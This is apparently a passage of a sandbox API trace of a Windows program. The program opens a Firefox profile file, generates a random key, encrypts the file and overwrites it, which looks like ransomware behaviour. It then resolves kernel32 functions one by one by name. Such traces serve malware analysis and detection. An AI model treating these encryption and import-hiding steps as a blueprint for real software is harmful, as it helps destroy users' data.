(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0082.011] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=4062) returned 1 [0082.011] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0082.011] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.012] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.012] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.012] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.013] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0082.013] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.013] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.013] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.013] CloseHandle (hObject=0x464) returned 1 [0082.014] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.014] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0082.015] CloseHandle (hObject=0x0) returned 0 [0082.015] CloseHandle (hObject=0x460) returned 1 [0082.015] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.015] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.015] GetTickCount () returned 0x114cfae [0082.015] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.015] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.015] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.016] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.016] lstrlenA (lpString="kernel32.dll") returned 12 [0082.016] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.016] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.016] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.016] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.016] lstrlenA (lpString="ADDATOMA") returned 8 [0082.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.016] lstrlenA (lpString="ADDATOMW") returned 8 [0082.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.016] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.017] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.017] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.017] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.017] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.017] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.017] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.017] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.017] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.017] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.017] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.017] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.017] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.017] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.017] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.017] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.017] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.017] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.018] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.018] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.018] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.018] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.018] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.018] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.018] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.018] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.018] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.018] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.018] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.018] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.018] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.018] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.018] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.018] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.018] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.018] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.018] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.018] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.019] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.019] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.019] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.019] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.019] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.019] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.019] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.019] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.019] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.019] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.019] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.019] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.019] lstrlenA (lpString="BEEP") returned 4 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.019] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.019] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.019] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.019] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.019] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.019] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.020] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.020] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.020] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.020] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.020] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.020] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.020] lstrlenA (lpString="CANCELIO") returned 8 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.020] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.020] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.020] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.020] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.020] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.020] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.020] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.020] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.020] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.020] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.020] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.020] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.021] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.021] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.021] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.021] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.021] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.021] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.021] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.021] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.021] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.021] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.021] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.022] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.022] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.022] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.022] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.022] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.022] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.022] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.022] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.022] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.022] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.022] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.022] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.022] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.022] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.022] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.022] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.022] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.022] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.022] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: 